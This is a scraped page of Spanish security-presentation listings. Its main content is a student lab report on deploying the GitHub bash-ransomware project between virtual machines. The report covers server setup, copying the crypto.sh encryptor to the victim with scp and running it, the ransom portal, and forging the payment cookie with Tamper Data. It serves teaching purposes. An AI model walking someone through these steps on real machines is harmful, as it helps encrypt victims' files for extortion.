En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del repositorio en github: https://github.com/SubtleScope/bash-ransomware.
El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el servidor donde se montarán los scripts del repositorio anteriormente mencionado y otra máquina que nos servirá como cliente o víctima para este caso. En la máquina víctima se ejecutará un script que cifrará todos los archivos del mismo.
Servicio VPN con OpenVPN y Latch sobre Raspberry PiTelefónica
Trabajo de Fin de Máster de los alumnos de la Universidad Europea de Madrid Álvaro Núñez-Romero Casado, Javier José Pecete García, Alejandro Amorín Niño y Juan Antonio Baeza Miralles que describe cómo montar un servicio de VPNs personal sobre una Raspberry Pi usando OpenVPN y Latch.
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
Paper escrito por Sheila A.Berta (@UnaPibaGeek) de ElevenPaths para explicar cómo es posible utilizar los exploits Eternalblue & Doublepulsar para obtener una shell remota de Empire o Meterpreter en sistemas Windows 7 o Windows Server 2008. English Version: https://www.exploit-db.com/docs/41896.pdf
Trabajo sobre Aplicaciones Web Seguras, en concreto Anti-SQL Injection, del módulo de Seguridad y Alta Disponibilidad del Ciclo Formativo de Grado Superior en Administración de Sístemas Informáticos en Red
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Max Morales
3ra. parte de instalación de Servidor proxy SQUID, que es ademas un firewall básico. ANDINUX es la primera Distribución boliviana de GNU/Linux. Edmundo Morales Ariñez y Max Morales Escobar
El siguiente laboratorio tiene como objetivo aprender como generar los certificados digitales propios con la herramienta opnessl, en un servidor en debian implementando el CMS Joomla
Servicio VPN con OpenVPN y Latch sobre Raspberry PiTelefónica
Trabajo de Fin de Máster de los alumnos de la Universidad Europea de Madrid Álvaro Núñez-Romero Casado, Javier José Pecete García, Alejandro Amorín Niño y Juan Antonio Baeza Miralles que describe cómo montar un servicio de VPNs personal sobre una Raspberry Pi usando OpenVPN y Latch.
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Telefónica
Paper escrito por Sheila A.Berta (@UnaPibaGeek) de ElevenPaths para explicar cómo es posible utilizar los exploits Eternalblue & Doublepulsar para obtener una shell remota de Empire o Meterpreter en sistemas Windows 7 o Windows Server 2008. English Version: https://www.exploit-db.com/docs/41896.pdf
Trabajo sobre Aplicaciones Web Seguras, en concreto Anti-SQL Injection, del módulo de Seguridad y Alta Disponibilidad del Ciclo Formativo de Grado Superior en Administración de Sístemas Informáticos en Red
Instalación de Servidores GNU/Linux - PROXY SQUID (parte 3)Max Morales
3ra. parte de instalación de Servidor proxy SQUID, que es ademas un firewall básico. ANDINUX es la primera Distribución boliviana de GNU/Linux. Edmundo Morales Ariñez y Max Morales Escobar
El siguiente laboratorio tiene como objetivo aprender como generar los certificados digitales propios con la herramienta opnessl, en un servidor en debian implementando el CMS Joomla
Configuración de 3 servicios con CentOS, utilizando el modo gráfico, esto aplica para el modo de linea de comandos.
***Cualquier comentario es bienvenido para corregir***
Hack like a pro with custom VPS - Najava Negra 2019Alejandro Quesada
Presentacion sobre el desarrollo de un custom VPS (Servidor Virtual Privado gratuito) en los principales proveedores de servicio como Google, Amazon y Azure para disponer de un equipo con diferentes servicios y protocolos instalados desde 0, que nos ayudaran a proteger nuestra privacidad, asegurar la integridad de los datos así como disponer de un equipo accesible desde cualquier lugar para realizar pruebas de concepto puntuales.
A lo largo del taller se mostrarán los diferentes problemas que esta solución mitiga y se desarrollará la instalación de:
Creación de diversas cuentas en los principales proveedores.
Bastionado de la maquina VPS on Cloud
Instalación del servicio OpenVPN
Instalación del bloqueador DNS Pi Hole
Instalación servicio Owncloud (plataforma de almacenamiento privado de archivos)
Otras tools para investigación y pruebas de seguridad
En esta práctica, emplearemos algunas de las características principalmente, la
utilización de servidores virtuales, como configuracion de servidor apache,configuracion de phpmyadmin e instalacion de joomla bajo el entorno ubuntu*
El ransomware en resumen es un malware que consiste en “secuestrar” los archivos de la PC víctima a cambio de dinero, diversión o con el fin de hacerle un daño a la persona o compañía cifrando a través de un programa o código los archivos de la computadora impidiendo su lectura, escritura y/o ejecución. Estos generalmente son encriptados y la única forma de poder recuperar dichos archivos es desbloqueando los archivos mediante contraseña, o desencriptándolo mediante algún algoritmo o aplicación específica.
En esta guía estaremos demostrando de manera breve cómo éste se aplica en la práctica.
Para ello, estaremos utilizando nuestra máquina real, en nuestro caso Windows 10 y una máquina virtual de Windows 7.
En este trabajo estaremos viendo HoneyPots con la implementación de HoneyDrive 3 que es una suite de Honeypots. De esta veremos su instalación y configuración de arranque virtual. Ademas pondremosen marcha y monitoreo dos honeypots conocidos en el mundo OpenSource los cuales son Kippo y Dionaea.
Todo equipo que tenga acceso por algún medio a la red global, está expuesto a ser vulnerado, independientemente del tipo de hardware o el sistema operativo.
Entendiendo esto entonces cada vez que se hagan experimentos o implementaciones con Software OpenSource, estos deben ser sometidos a diferentes pruebas de resistencia contra las vulnerabilidades. Esto es el análisis de riesgos y el plan de mitigación de riesgos, que todo servidor *NIX debe
someterse al momento de hacer implementaciones de servicio a través de estos sistemas operativos de software libre.
A continuación en el proyecto que se desarrolla en el trabajo presentado veremos la implementación de un servidor web utilizando solo herramientas OpenSource.
Muchas de las características que queremos resaltar de seguridad las veremos en los capítulos siguientes de los cuales podemos decir brevemente de que tratan.
Son servidores de información falsos, que son posicionados estratégicamente en una red de prueba y alimentados de información disfrazada como archivos de naturaleza confidencial.
Son herramientas de seguridad informática diseñadas para atraer atacantes y analizar el comportamientos de los ataques que realizan estos atacantes, para utilizar esto como referencia para diferentes propósitos, que pueden ser:
Estadísticas
Descubrimiento de nuevas vulnerabilidades y herramientas.
Análisis de ataques, para su posterior estudio.
Evitar que los principales sistemas de información sean atacados.
Gracias a la ejecución de este proyecto, hemos logrado aprender a configurar e instalar diferentes software que nos ayudarán en nuestro entorno laboral, para así, poder
implementar lo aprendido en el área IT, con la finalidad de proteger la información sensitiva que maneje la empresa para la cual estemos prestando nuestros servicios. Además, podemos mencionar, que no solamente adquirimos conocimientos para ejecutarlos en nuestros trabajos, sino para crear conciencia de que debemos tener mejor protegidos nuestras máquinas personales, como un simple ejemplo que podemos mencionar es , contar siempre con una sesión de administrador para evitar software maliciosos que perjudiquen nuestros equipos, además de tener instalado en cada máquina un antivirus, antimalware y
antiexploit para la protección de las mismas.
Por otro lado, otros temas aprendidos durante el transcurso de la materia, podemos mencionar la configuración del Firewall PfSense y el IPS SmoothSec, donde tuvimos que
listar reglas para evitar que el usuario final al momento de querer navegar en Internet, no entrará a páginas que estén prohibidas en el lugar donde se encuentre. En cuanto a el
firewall, las reglas son implementadas por medio de categorías que nos aparecerán en la consola del software y el smoothsec se configura mediante un directorio donde debemos
descomentar las que nosotros queremos que el software aplique en su ejecución. Cabe resaltar, que estos dos software se conectan con varias interfaces de red para poder ejecutar
de manera correcta cada uno de ellos.
Otro tema que pudimos aprender, es la implementación de un antispam para evitar que las bandejas de entrada de las cuentas de correo electrónico se llenen de información que no es útil o de documentos malintencionados.
Además, podemos complementar la información brindada en este documento, mencionando que cada uno de los software que instalamos DEBIAN tener más de una máquina corriendo
para que su ejecución fuera la correcta, siendo así, tener que usar diferentes máquinas virtuales para cada uno de los puntos ejecutados en nuestro proyecto. Por esto, tuvimos que
generar un diagrama, donde se crearon diferentes zonas para poder llegar a la conclusión de cual era la mejor manera de llevar a cabo toda la implementación del proyecto.
Hoy en día, organizaciones con distintos fines operativos cuentan como mínimo con un sistema de redes interno, así sea solo una computadora con acceso a internet. Estos equipos pueden contar con información valiosa o con un servicio
valioso para la organización. Estos activos o equipos valiosos pueden ser víctimas de distintas amenazas y el impacto puede ser catastrófico de acuerdo al nivel de criticidad que representa el activo.
Para evitar que pase este tipo de eventos existen sistemas
correlacionador de eventos SIEM que busca notificar a los administradores de la red entre otros monitores, los distintos eventos que están ocurriendo en la red.
Los eventos que pueden ocurrir varían entre el tipo de acción que se deba aplicar al activo.
Por ejemplo un virus informático puede estar recorriendo la red,
esperando que un equipo con información valiosa se conecte a red y así pueda hacer diferentes cosas que tiene como objetivo tal virus. Otros ejemplos son las notificaciones por actualización, puertos abiertos, contraseñas débiles, etc.
En el siguiente proyecto queremos mostrar cómo podemos implementar una de estas herramientas de correlacionación con el fin de que sirva como buena práctica al momento de querer monitorear los eventos que ocurren en la red.
Es un nuevo tipo de recopilación de pruebas digital basado en la extracción de pruebas desde el interior de la memoria de un teléfono móvil cuando existe la capacidad de acceder a los datos.
Los mecanismos que dejan rastro de la actividad de los usuarios, de los programas que se utilizan, los accesos, conexiones y aplicaciones, si han navegado, descargado o ejecutado algún programa, son los comúnmente denominados como artefactos
Es un framework o conjunto de subsistemas de software para el desarrollo de aplicaciones, y páginas web dinámicas, que están basadas, cada una de estas en el popular lenguaje de programación conocido como JavaScript. Gracias a esta característica el conjunto se integra exitosamente en una plataforma auto-suficiente.
Cada subsistema del Mean stack es de código abierto y de uso gratuito.
Herramienta de penetración y evaluación de seguridad orientado en Ubuntu – Linux proporcionando un conjunto de herramientas de análisis de los sistemas de información de la red. Este Sistema operative, incluye un conjunto completo de herramientas necesarias para el hacking ético y pruebas de seguridad.
Seguridad Base de Datos sql injection v1.0José Moreno
Método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación a nivel de validación de entradas para realizar operaciones sobre una base de datos.
Sistema que permite registrar los cambios en un archivo o conjunto de archivos con el tiempo para poder verificar versiones especificas mas adelante. Para diseñadores web o programadores en general es una de las herramientas mas considerables a utilizar.
Protección de Sitios Web con WAF LógicoJosé Moreno
Firewall de Aplicación Web: al igual que un
firewall convencional, se encarga de proteger
tu red. Pero un WAF irá más allá y te ayudará
a proteger tus aplicaciones web de ataques
que, normalmente, son un dolor de cabeza
para los administradores de las aplicaciones
o para los dueños de las mismas.
Laboratorio 7 mod security - evasive - qosJosé Moreno
Detallamos los pasos para el desarrollo del laboratorio, primero
iniciaremos con la instalación y configuración del Mod Security (nuestro WAF), luego continuamos con el Mod Evasive (nuestro IPS) y por último el Mod Qos (Nuestra protección contra ataques de denegación de servicios o Slow Loris).
Hardening o endurecimiento al sistema operativo, son las configuraciones que por seguridad de nuestro
sistema operativo, es necesario configurar algunos parámetros que por defecto trae nuestro servidor y las
aplicaciones que vamos a instalar, para así reducir la cantidad de vulnerabilidades en el mismo, esto lo
podemos lograr eliminando aplicaciones, servicios, usuarios innecesarios en el sistema así como cerrando
puertos que tampoco estén en uso, además de otros métodos que pueden ayudarnos a proteger nuestros
servidores.
El principal motivo para endurecer la seguridad de nuestro servidor FTP, es ganar tiempo frente a un
ataque, pues entre más configuraciones y otros métodos de seguridad implementemos, nunca lograremos
evitar por completo, que un atacante logre su objetivo si no le agregamos a nuestra seguridad, un
monitoreo de todos los equipos, por medio de alertas.
Cabe aclarar que el hardening de un equipo aunque es un elemento importante, no es el único factor de
protección que se debe implementar para proteger los servidores y equipos dentro de nuestra red, es
importante implementar protección externa a nuestros equipos, por medio de Firewall, IPS, IDS,
HoneyPots. Dentro de este trabajo solo nos limitaremos a la protección de nuestro servidor FTP, por medio
de configuraciones al sistema operativo, y apoyándonos en aplicaciones externas de sistema operativo,
para limitar el acceso que cada usuario pueda tener dentro del directorio de nuestro servidor.
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0...Telefónica
Índice del libro "Big Data: Tecnologías para arquitecturas Data-Centric" de 0xWord escrito por Ibón Reinoso ( https://mypublicinbox.com/IBhone ) con Prólogo de Chema Alonso ( https://mypublicinbox.com/ChemaAlonso ). Puedes comprarlo aquí: https://0xword.com/es/libros/233-big-data-tecnologias-para-arquitecturas-data-centric.html
Inteligencia Artificial y Ciberseguridad.pdfEmilio Casbas
Recopilación de los puntos más interesantes de diversas presentaciones, desde los visionarios conceptos de Alan Turing, pasando por la paradoja de Hans Moravec y la descripcion de Singularidad de Max Tegmark, hasta los innovadores avances de ChatGPT, y de cómo la IA está transformando la seguridad digital y protegiendo nuestras vidas.
3Redu: Responsabilidad, Resiliencia y Respetocdraco
¡Hola! Somos 3Redu, conformados por Juan Camilo y Cristian. Entendemos las dificultades que enfrentan muchos estudiantes al tratar de comprender conceptos matemáticos. Nuestro objetivo es brindar una solución inclusiva y accesible para todos.
1. Universidad Tecnológica de Panamá
Facultad de Ingeniería de Sistemas Computacionales
Licenciatura en Ingeniería de Sistema de Información
Curso:
Tópicos 1
Proyecto #1
“Bash-Ransomware”
Facilitador:
Jose Moreno
Integrantes:
Berrocal, Abdiel 8-891-2399
Monteza, Otman 8-892-586
Grupo:
1IF-252
2. En este proyecto se aborda el tema del ransomware. Se utilizó los scripts del
repositorio en github: https://github.com/SubtleScope/bash-ransomware.
El desarrollo de este proyecto consta de utilizar dos máquinas: una que es el
servidor donde se montarán los scripts del repositorio anteriormente mencionado y
otra máquina que nos servirá como cliente o víctima para este caso. En la
máquina víctima se ejecutará un script que cifrará todos los archivos del mismo.
Paso 1:
Crear una máquina virtual (Ubuntu server) que será la máquina server, en la cual
se montarán los scripts.
Para la segunda máquina podemos hacer un clon de la primera, ya que solo
ejecutaremos el script de cifrado en ella.
Figura #1
Paso 2:
Una vez encendida la máquina (Ransom-ServerSide) procederemos a descargar
los archivos del repositorio. Utilizamos el comando git clone para clonar el
repositorio en la máquina.
Comando: git clone https://github.com/SubtleScope/bash-ransomware
Figura #2
Paso 3:
Copiamos el contenido de la carpeta bash-ransomware en la dirección
/var/www/html
3. Le cambiamos los permisos con: chown -R www-data:root /var/www/html
Figura #3
Paso 4:
Dentro de la carpeta html se encuentran los archivos del repositorio que habíamos
clonado con anterioridad. En estos debemos realizar ciertas configuraciones que
la guía en github nos indican.
Imagen #4
En el archivo “target.php” debemos cambiar las líneas donde se manejan las
variables de tiempo (fecha y hora).
Figura #5
4. Paso 5:
Creación de la llave y certificados con openssl.
Figura #6
Una vez hecho esto, los movemos a la siguiente dirección: /etc/ssl/. En esta
existen dos carpetas: certs y private. Los moveremos de la siguiente manera:
Comando para mover el server.crt: mv server.crt /etc/ssl/certs/
Comando para mover el server.key: mv server.key /etc/ssl/private/
Imagen #7
Lo siguiente que haremos es reiniciar el ssl con el comando: a2enmod ssl.
Después reiniciamos el apache con: systemctl restart apache2.
Paso 6: seguimos con las configuraciones, ahora es con el archivo “crypto.sh”.
Primero nos dirigimos a la dirección “/var/www/html” si no nos encontrábamos allí
desde antes. Creamos la carpeta “downloads” con el comando mkdir (Ej. mkdir
downloads).
Configuramos el archivo crypto.sh con lo siguiente:
Figura #8
La primera línea nos indica que en todo el archivo cuando encuentre la cadena
“192.168.1.132” lo cambie por las Y’s (estas Y’s son la Ip de nuestro servidor).
La segunda línea es si lo queremos cambiar por un dominio.
5. Copiamos el archivo “crypto.sh” en la carpeta que habíamos creado “downloads”.
Paso 7: creación de la base de datos victims y exchange.
Creación de “victims”:
Figura #9
Figura #10
Creación de “exchange”:
Figura #11
Figura #12
6. Paso 8: lado del cliente o víctima.
Procedemos a descargar el archivo “crypto.sh”, que es el encargado de cifrar la
máquina cliente (víctima), utilizando el comando “scp” (secure copy) el cual se
comunica con ssh.
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/para/copiar /dirección/para/pegar
O el
Comando: scp -P [#puerto] [user]@[serverip]:/dirección/origen /dirección/destino
Ejemplo: si el #puerto es distinto de 22 se debe escribir después de la opción -P, de otro
modo se puede dejar así.
Comando: scp user@YYY.YYY.YYY.YYY:/var/www/html/downloads/crypto.sh /home/user
Figura #13
Nota: “cuando se ejecuta este comando nos presentará una huella digital para la conexión en el
cual escribiremos “yes” para continuar, luego nos pedirá la contraseña del servidor al cual nos
queremos conectar. Si la contraseña se ingresó correctamente nos descargará (copiará) el archivo
que pedimos en la ruta de destino que elegimos.”
El user se cambia por el nombre de usuario y las Y’s se cambian por la ip del
server que se posea.
Paso 9: ejecución del script “crypto.sh”.
Estando aún en la máquina víctima le damos permiso 755 con el comando:
“chmod 755 crypto.sh”.
Luego lo ejecutamos utilizando sudo ./crypto.sh o si estamos en modo root,
solamente teclear ./crypto.sh.
Esperamos hasta que se termine de cifrar.
Figura #14
Una vez finalizado el cifrado, nos mostrará un mensaje como el de la “figura #14”
con la dirección a visitar y un “id”.
https://192.168.227.100/decrypt.php en este caso.
7. Paso 10: ingresar por medio del browser a la dirección dada en la “figura #14”
Figura #15
Procedemos a ingresar el “id” que nos muestra en la “figura #14”
Figura #16
8. También podemos observar el tiempo que le queda y otra información en
https://192.168.227.100/admin.php
Figura #17
Paso 11: le damos click en “Pay here”. Figura #16. Nos dirigirá al sitio de pago
donde haremos click en: “M4dH4t’z Exchange”.
Figura #18
9. Este a su vez nos dirigirá a esta otra página:
Figura #19
En la “Figura #19” nos registraremos. Este nos dará un (1) bitcoin, sin embargo,
para poder descifrar nuestros archivos necesitaremos 4 más.
Nos registramos utilizando:
Username: bobilibobili
Password: 12345
Figura #20
10. Paso 12: uso de la herramienta “Tamper Data”. Esta herramienta se puede
instalar en el navegador Firefox (navegador utilizado para este proyecto). Solo
debemos ir a instalar extensiones y buscar “Tamper data”.
Figura #21
Figura #22
11. Hacemos click en Tamper Data, luego en “Start” (iniciar).
Una vez iniciado le damos click en registrar, esto accionará lo siguiente en el
Tamper Data:
Figura #23
Le hacemos click en “Tamper”
Figura #24
Si nos fijamos en la figura #24 en la sección “Cookie” podemos observar la
cantidad de bitcoins que nos están dando. En este caso lo modificaremos con otro
valor distinto de uno (1), pero mayor a cinco (5), ya que para poder descifrar
nuestros archivos necesitamos cinco (5) bitcoins, es solo para asegurarnos de
tener los suficientes bitcoins.
Le asignamos cincuenta (50) bitcoins en la sección “Cookie”.
12. Figura #25
Le hacemos click en “OK” en la figura #25.
Figura #26
Nos dará nuestro id de transacción el cual deberemos copiar.
13. Paso 13: ingresar el id de transacción dado anteriormente.
Figura #27
Luego le damos click en “Pay”.
Nos mostrará el tiempo que debemos esperar para poder descifrar nuestros
archivos.
Figura #28
Paso 14: podemos observar nuevamente en https://192.168.227.100/admin.php si
se realizó el pago.
Figura #29
14. Paso 15: descargar los archivos para descifrar.
Figura #30
Paso 16: copiar los archivos descargados a la máquina víctima.
Para este caso utilizamos una tercera máquina con BackBox, en el cual
descargamos los archivos para descifrar y los copiaremos a la máquina victima
utilizando el comando, anteriormente mencionado, “scp”. Esta vez el comando
tendrá un ligero cambio, ya que copiaremos del BackBox a la máquina victima por
lo que escribiremos el comando de esta manera.
Comando: scp /dirección/backbox/copiar user@ipserver:/direccion/destino/pegado
Figura #31
Ejecutamos el decrypto.sh en la máquina víctima con el comando sudo
./decrypto.sh o si estamos en modo root escribir solamente ./decrypto.sh y
deberemos tener después nuestros archivos descifrados.
Figura #32